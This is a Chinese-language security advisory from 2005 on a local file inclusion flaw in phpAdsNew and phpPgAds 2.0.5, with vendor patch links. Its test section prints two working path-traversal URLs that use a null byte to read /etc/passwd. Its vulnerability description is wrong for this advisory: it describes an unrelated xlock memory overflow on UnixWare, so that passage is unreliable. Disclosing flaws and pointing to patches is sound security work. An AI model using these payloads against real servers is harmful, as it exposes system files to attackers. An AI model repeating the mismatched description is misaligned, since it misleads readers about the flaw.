您所在的位置: 首页 > 网络安全 > 漏洞补丁 > Unix >

phpAdsNew/Postgres本地文件包含漏洞

http://netsecurity.51cto.com  2005-08-19 17:27    51CTO.COM  我要评论(0)
  • 摘要:设计错误
  • 标签:漏洞  PHP


信息提供:

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

存在本地文件包含漏洞

攻击类型:

本地攻击

发布日期:

2005-08-19

更新日期:

2005-08-19

受影响系统:

phpAdsNew phpAdsNew 2.0.5
phpPgAds phpPgAds 2.0.5

安全系统:

phpAdsNew phpAdsNew 2.0.6
phpPgAds phpPgAds 2.0.6

漏洞报告人:

Maksymilian Arciemowicz

漏洞描述:

大多数X Window系统都安装了xlock程序,在Caldera UnixWare和Open Unix中,该软件存在安全问题。该漏洞可以引起内存溢出问题。利用该漏洞,恶意用户就可以执行非法代码,从而获取非法权限,甚至管理员权限。

    
测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00

http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00


解决方法:

厂商补丁:
phpAdsNew
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://phpadsnew.com/two/index.html
phpPgAds
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.phppgads.com/one/

PHP开发基础入门
用户如何应对ANI漏洞
访谈:Windows平台,企业网站漏洞的攻击和防御
PHP+APACHE+MYSQL下载汇总
PHP开发应用手册
 
 验证码: (点击刷新验证码)   匿名发表
  • .NET程序员面试指南

  • 作者:朱毅
  • 本书着重针对.NET技术职位的应聘者,在.NET框架各个技术类别中,选取最常出现在.NET面试中的问题,进行分析和解答,同时解释和..
Copyright©2005-2008 51CTO.COM 版权所有